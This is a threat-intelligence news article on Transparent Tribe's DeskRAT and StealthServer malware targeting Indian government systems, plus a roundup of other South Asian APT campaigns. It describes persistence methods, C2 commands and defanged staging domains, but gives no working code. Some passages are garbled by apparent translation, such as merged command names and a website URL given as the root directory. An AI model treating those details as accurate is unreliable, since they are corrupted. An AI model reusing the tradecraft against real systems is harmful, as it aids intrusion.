Pakistan-linked attackers were observed targeting Indian government agencies as part of a spear-phishing attack aimed at delivering Golang-based malware. explained.
The activity, which Sekoia observed in August and September 2025, is believed to be the work of Transparent Tribe (also known as APT36), a state-sponsored hacking group known to have been active since at least 2013. This activity also builds on a previous campaign unveiled by CYFIRMA in August 2025.
The attack chain involves sending a phishing email with a ZIP file attachment. In some cases, it also includes links pointing to archives hosted on legitimate cloud services such as Google Drive. Inside the ZIP file is a malicious desktop file embedded with a command that uses Mozilla Firefox to display a decoy PDF (‘CDS_Directive_Armed_Forces.pdf’) and at the same time execute the main payload.
Both artifacts are retrieved from the external server ‘modgovindia(.)com’ and executed. As before, this campaign is designed to target BOSS (Bharat Operating System Solutions) Linux systems and uses a remote access Trojan that can establish command and control (C2) using WebSockets.
The malware supports four different persistence methods, including creating a systemd service, setting up a cron job, adding the malware to the Linux autostart directory (‘$HOME/.config/autostart’), and configuring a .bashrc that launches the Trojan using a shell script written to the ‘$HOME/.config/system-backup/’ directory.
DeskRAT supports five different commands.
- Pingsends a JSON message with the current timestamp and “pong” to the C2 server.
- heart ratesends a JSON message containing heartbeat_response and timestamp.
- reference filesend directory listing
- start collectionsearches for and sends files that match a predefined set of extensions and are less than 100 MB in size.
- Upload_Executedrop and run additional Python, shell, or desktop payloads.
“DeskRAT’s C2 server is named as a stealth server,” the French cybersecurity firm said. “In this context, a stealth server refers to a name server that does not appear in the publicly visible NS records of the associated domain.”
“While initial campaigns leveraged legitimate cloud storage platforms such as Google Drive to distribute malicious payloads, TransparentTribe has now moved to using dedicated staging servers.”
The findings follow a report from QiAnXin XLab, which details a campaign targeting Windows endpoints with a Golang backdoor tracked as StealthServer through phishing emails with booby-trapped desktop file attachments, suggesting a cross-platform focus.
It’s worth noting that there are three variants of StealthServer for Windows.
- Stealth Server Windows-V1 (observed in July 2025), employs several anti-analysis and anti-debugging techniques to evade detection. Establish persistence using scheduled tasks, PowerShell scripts added to the Windows startup folder, and changes to the Windows registry. Communicate with the C2 server using TCP to enumerate files and upload/download specific files.
- Stealth Server Windows-V2 (Confirmed late August 2025), adds new anti-debug checks to tools such as OllyDbg, x64dbg, and IDA, while retaining functionality.
- Stealth Server Windows-V3 (observed in late August 2025), uses WebSockets for communication and has the same functionality as DeskRAT.
XLab said it also observed two Linux variants of StealthServer, one of which was DeskRAT, which supports an additional command called “welcome.” The second Linux version, on the other hand, uses HTTP instead of WebSockets for C2 communication. Features three commands –
- Browseenumerates the files in the specified directory.
- uploaduploads the specified file
- executeRun a bash command
It also recursively searches the root directory (‘https://thehackernews.com/’) for files matching a set of extensions and sends the found files in encrypted form via an HTTP POST request to ‘modgovindia(.)space:4000’. This indicates that the Linux variant may have been an earlier version of DeskRAT, as the latter has a dedicated “start_collection” command for extracting files.
“This group’s operations are frequent and characterized by a wide variety of tools, numerous variations, and high frequency of delivery,” said QiAnXin XLab.
Attacks from other South and East Asian threat clusters
The development comes amid the discovery of various campaigns orchestrated by South Asia-focused threat actors in recent weeks.
- Phishing campaign conducted by Bitter APT targeting government, power, and military sectors in China and Pakistan. CVE-2025-8088 is exploited using a malicious Microsoft Excel attachment or RAR archive, ultimately dropping a C# implant named ‘cayote.log’ that can collect system information and execute arbitrary executable files received from an attacker-controlled server.
- A new wave of targeted activity conducted by SideWinder. Targeting the maritime sector and other industries in Pakistan, Sri Lanka, Bangladesh, Nepal, and Myanmar, it uses credential harvesting portals and weaponized lure documents to distribute multi-platform malware as part of an “intensive” campaign codenamed Operation Southnet.
- An attack campaign conducted by a Vietnamese-aligned hacker group known as OceanLotus (also known as APT-Q-31). Provides a Havoc post-exploitation framework in attacks targeting businesses and government departments in China and neighboring Southeast Asian countries.
- Attack campaign conducted by Mysterious Elephant (aka APT-K-47) in early 2025. Using a combination of exploit kits, phishing emails, and malicious documents, PowerShell scripts that drop BabShell (C++ reverse shell) are used to gain initial access to targeted government and diplomatic departments in Pakistan, Afghanistan, Bangladesh, Nepal, India, and Sri Lanka. It then launches MemLoader HidenDesk (a loader that executes the Remcos RAT payload in memory) and MemLoader Edge (another malicious loader that embeds VRat, a variant of the open source RAT vxRat).
Notably, these intrusions also focused on stealing WhatsApp communications from compromised hosts using a number of modules (i.e. Uplo Exfiltrator and Stom Exfiltrator) that specialize in capturing various files exchanged through the popular messaging platform.
Another tool used by threat actors is ChromeStealer Exfiltrator. As the name suggests, it can collect cookies, tokens, and other sensitive information from Google Chrome as well as siphon files related to WhatsApp.
The disclosure reveals a hacking group that has evolved into a sophisticated threat operation that not only relies on the tools of other threat actors, but also uses its own custom malware. This enemy is known to have tactical overlap with Origami Elephant, Confucius, and SideWinder, all of which are assessed to operate with India’s interests in mind.
“Mysterious Elephant is a highly sophisticated and active advanced persistent threat group that poses a significant threat to government and diplomatic sectors in the Asia-Pacific region,” Kaspesky said. “The use of custom-made open source tools such as BabShell and MemLoader highlights the technical expertise and willingness to invest in the development of advanced malware.”
